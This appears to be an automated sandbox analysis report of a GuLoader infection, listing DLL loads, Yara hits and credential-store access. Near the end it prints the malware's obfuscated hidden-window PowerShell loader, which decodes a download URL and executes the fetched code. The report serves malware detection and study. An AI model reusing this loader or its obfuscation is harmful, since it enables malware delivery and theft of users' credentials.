          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2595452528.00000000026D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPzDKsDmTWqJ.exe, 0000000D.00000002.3286344081.000000000099E000.00000002.00000001.01000000.00000009.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000000.2862732022.000000000099E000.00000002.00000001.01000000.00000009.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbOS_1 source: powershell.exe, 00000006.00000002.2603068995.0000000006DB0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdbGCTL source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdb source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000006.00000002.2609998888.000000000A058000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2609327790.00000000080B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2599496258.0000000005493000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Udbredes)$global:Ernestines = [System.Text.Encoding]::ASCII.GetString($Hnseavler)$global:zoblens=$Ernestines.substring($Hyacint,$Shutterwise)<#Nondevelopmentally Universalisten Halfm
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Cryptonym250 $Testimoniernes $Kakkak), (lugger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Glorrig = [AppDomain]::CurrentDomain.GetAssemblies()$global:
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Foster)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gumboil, $false).DefineType($Polychroism162, $Efte
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Udbredes)$global:Ernestines = [System.Text.Encoding]::ASCII.GetString($Hnseavler)$global:zoblens=$Ernestines.substring($Hyacint,$Shutterwise)<#Nondevelopmentally Universalisten Halfm
          Obfuscated command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca 